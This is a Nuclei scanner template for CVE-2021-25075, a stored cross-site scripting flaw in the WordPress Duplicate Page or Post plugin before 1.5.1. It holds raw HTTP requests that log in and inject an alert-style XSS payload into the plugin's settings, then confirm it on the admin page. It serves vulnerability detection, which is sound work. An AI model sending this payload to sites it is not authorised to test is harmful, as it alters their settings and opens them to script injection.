WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
PoC代码[已公开]
id: CVE-2021-25075
info:
name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
author: DhiyaneshDK
severity: low
description: |
WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 1.5.1.
reference:
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
- https://nvd.nist.gov/vuln/detail/CVE-2021-25075
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/kazet/wpgarlic
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
cvss-score: 3.5
cve-id: CVE-2021-25075
cwe-id: CWE-862
epss-score: 0.07524
epss-percentile: 0.91446
cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: wpdevart
product: duplicate_page_or_post
framework: wordpress
tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
- "toplevel_page_wpda_duplicate_post_menu"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100f4a389648569f0c8feb29cd0d9cd3d96b11a00b2d599473aba2a90b02946cdd9022074d1e0b7f76dbce04703acfc1d79217c8a35cdd30e740079c701bd2959a7947c:922c64590222798bb761d5b6d8e72950